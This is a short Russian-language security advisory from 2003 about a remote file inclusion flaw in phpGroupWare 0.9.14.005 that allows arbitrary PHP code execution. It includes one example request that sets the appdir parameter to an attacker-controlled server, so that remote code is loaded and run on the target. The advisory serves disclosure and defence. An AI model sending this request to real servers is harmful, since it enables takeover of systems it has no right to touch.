Security Lab

Выполнение произвольного PHP кода в phpGroupWare

Дата публикации:25.07.2003
Всего просмотров:1611
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость включения файла обнаружена в phpGroupWare. Удаленный пользователь может выполнить произвольный PHP код на целевом сервере.

Удаленный пользователь может определить удаленное местоположение для переменной $appdir, чтобы включить 'tables_update_0_9_9.inc.php' файл, расположенный на сервере атакующего, который будет выполнен не целевом сервере. Пример:

http://[target]/phpgroupware/phpgwapi/setup/tables_update.inc.ph p?appdir=http://[evilserver]/

Уязвимость обнаружена в phpGroupWare www.phpgroupware.org/ 0.9.14.005

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: phpGroupWare v0.9.14.005 Remote Include Vulnderability